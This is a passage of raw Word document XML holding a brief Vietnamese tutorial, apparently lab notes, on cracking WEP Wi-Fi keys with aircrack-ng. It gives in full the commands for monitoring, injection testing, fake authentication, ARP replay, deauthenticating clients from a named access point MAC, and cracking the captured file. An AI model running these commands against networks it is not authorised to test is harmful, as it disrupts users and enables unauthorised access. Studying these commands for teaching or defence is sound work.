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A87" w:rsidRDefault="00542F69">
      <w:r w:rsidRPr="00542F69">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BEF3D86" wp14:editId="7AB25AAE">
            <wp:extent cx="5943600" cy="2124710"/>
            <wp:effectExtent l="0" t="0" r="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69" w:rsidRDefault="00542F69">
      <w:r>
        <w:t># airodump-ng wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542F69" w:rsidRDefault="00542F69">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5941060" cy="2579370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F69" w:rsidRDefault="00542F69">
      <w:r>
        <w:t>Chuyển channel cùng với channel của AP mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542F69" w:rsidRDefault="00542F69">
      <w:r>
        <w:t># iwconfig wlan0mon channel 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542F69" w:rsidRDefault="00542F69">
      <w:r>
        <w:t>Kiểm tra packet injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542F69" w:rsidRDefault="00542F69">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK1"/>
      <w:r w:rsidRPr="00542F69">
        <w:t>aireplay-ng -9 -a 64:70:02:92:BF:0A</w:t>
      </w:r>
      <w:r w:rsidRPr="00542F69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00542F69">
        <w:t>wlan0mon</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00542F69" w:rsidRDefault="00542F69">
      <w:r w:rsidRPr="00542F69">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3929424B" wp14:editId="1EF46756">
            <wp:extent cx="5943600" cy="16668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A0" w:rsidRDefault="002C58A0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="002C58A0">
        <w:t>airodump-ng -c 5 --bssid 64:70:02:92:BF:0A  -w WEP_crack wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C58A0" w:rsidRDefault="00101BA5">
      <w:r w:rsidRPr="00101BA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F6F095D" wp14:editId="64DD3A41">
            <wp:extent cx="5943600" cy="1343660"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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A0" w:rsidRDefault="00101BA5">
      <w:r>
        <w:t>Fake auth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C58A0" w:rsidRDefault="002C58A0">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="002C58A0">
        <w:t>aireplay-ng -1 0 -a 64:70:02:92:BF:0A -h 48:86:E8:ED:01:00 wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00101BA5" w:rsidRDefault="00101BA5">
      <w:r w:rsidRPr="00101BA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08E08339" wp14:editId="592529E4">
            <wp:extent cx="5943600" cy="127825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A5" w:rsidRDefault="00101BA5">
      <w:r>
        <w:t>&lt;bonus&gt; biết thêm phương thức chứng thực open system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00101BA5" w:rsidRDefault="00101BA5">
      <w:r w:rsidRPr="00101BA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67FA7474" wp14:editId="0FEC1662">
            <wp:extent cx="5943600" cy="1386840"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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A5" w:rsidRDefault="00101BA5">
      <w:r>
        <w:t>Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00101BA5" w:rsidRDefault="00101BA5">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00101BA5">
        <w:t>aireplay-ng -3 -b 64:70:02:92:BF:0A -h 48:86:E8:ED:01:00 wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00101BA5" w:rsidRDefault="0067633E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="1092200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40E" w:rsidRDefault="008E240E" w:rsidP="008E240E">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="008E240E">
        <w:t>aireplay-ng -0 3 -a 64:70:02:92:BF:0A -h 48:86:E8:ED:01:00 wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E240E" w:rsidRDefault="0067633E" w:rsidP="008E240E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="713740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40E" w:rsidRDefault="008E240E" w:rsidP="008E240E">
      <w:r>
        <w:t>Sau khi deauth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E240E" w:rsidRDefault="0067633E" w:rsidP="008E240E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="1157605"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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E240E" w:rsidRDefault="008E240E" w:rsidP="008E240E"/>
    <w:p w:rsidR="00101BA5" w:rsidRDefault="00101BA5"/>
    <w:p w:rsidR="008E240E" w:rsidRDefault="008E240E"/>
    <w:p w:rsidR="00101BA5" w:rsidRDefault="00101BA5">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00101BA5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00101BA5">
        <w:t>aircrack-ng WEP_crack-01.cap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00101BA5" w:rsidRDefault="00101BA5">
      <w:r w:rsidRPr="00101BA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C475F7E" wp14:editId="25A5605B">
            <wp:extent cx="5943600" cy="284480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A5" w:rsidRDefault="00101BA5"/>
    <w:p w:rsidR="00542F69" w:rsidRDefault="00542F69"/>
    <w:p w:rsidR="00542F69" w:rsidRDefault="00542F69"/>
    <w:sectPr w:rsidR="0054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69"/>
    <w:rsid w:val="00085C63"/>
    <w:rsid w:val="00101BA5"/>
    <w:rsid w:val="001A55BE"/>
    <w:rsid w:val="002C58A0"/>
    <w:rsid w:val="00542F69"/>
    <w:rsid w:val="0067633E"/>
    <w:rsid w:val="00731D39"/>
    <w:rsid w:val="00824A87"/>
    <w:rsid w:val="008E240E"/>
    <w:rsid w:val="00D4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C4E4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B02DD0D0-AD61-416A-9B58-15FA2623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Hiếu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>An Hiếu</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-06-29T15:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-29T16:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>